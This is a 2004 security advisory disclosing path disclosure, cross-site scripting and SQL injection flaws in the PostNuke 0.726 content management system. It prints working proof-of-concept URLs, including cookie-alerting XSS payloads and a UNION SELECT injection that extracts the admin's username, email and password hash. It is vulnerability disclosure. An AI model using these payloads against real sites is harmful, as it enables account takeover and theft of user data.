[waraxe-2004-SA#020] - Multiple vulnerabilities in PostNuke 0.726 Phoenix

Author: Janek Vind "waraxe"
Date: 18. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=20

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PostNuke: The Phoenix Release (0.7.2.6)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1 - legacy code

http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice
Fatal error: Call to undefined function: deletenotice() in D:apache_wwwrootpostnuke0726admin.php on line 87

It seems, that this function - deletenotice() - is removed in new versions, but reference still exists.
Btw, anyone without any authentication can provoke this error, not only admins.

A2 - path disclosure through sql injection

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p
Fatal error: Call to a member function on a non-object in D:apache_wwwrootpostnuke0726modulesNS-Pollscomments.php on line 454

This is sql injection bug through variable named "thold", but here we use it for path disclosure.

B. Cross-site scripting aka XSS:

Exploiting XSS in PostNuke is difficult task, because PostNuke will filter out most of the "useful"
tags, like <script>. But anyway, there exists XSS bugs and they can be exploited, using some
custom technics (therefore loosing crossbrowser compatibility of the sploit).

B1 - XSS through unsanitaized variable "$order"

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><s%00cript>alert(document.cookie);</s%00cript>ppp&thold=99
http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=ppp><body%20onload=alert(document.cookie);

C. Sql injection:

C1 - critical sql injection in NS-Polls

This is devastating case of the sql injection, because it can be used to pull out from database
ANY data, attacker needs.

http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=99999%20UNION%20SELECT%20null,null,null,null,pn_pass,pn_email,null,null,pn_uname,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*

... and we will see admin's username, email and password's md5 hash in plaintext ;)

Remark - this sploit needs mysql version >=4.x with UNION functionality enabled!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused!
Special greets to UT Bee Clan members at http://bees.tk ! "Boom!!" ;)

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

Published on: 2005-01-06 (13582 reads)

[ Go Back ]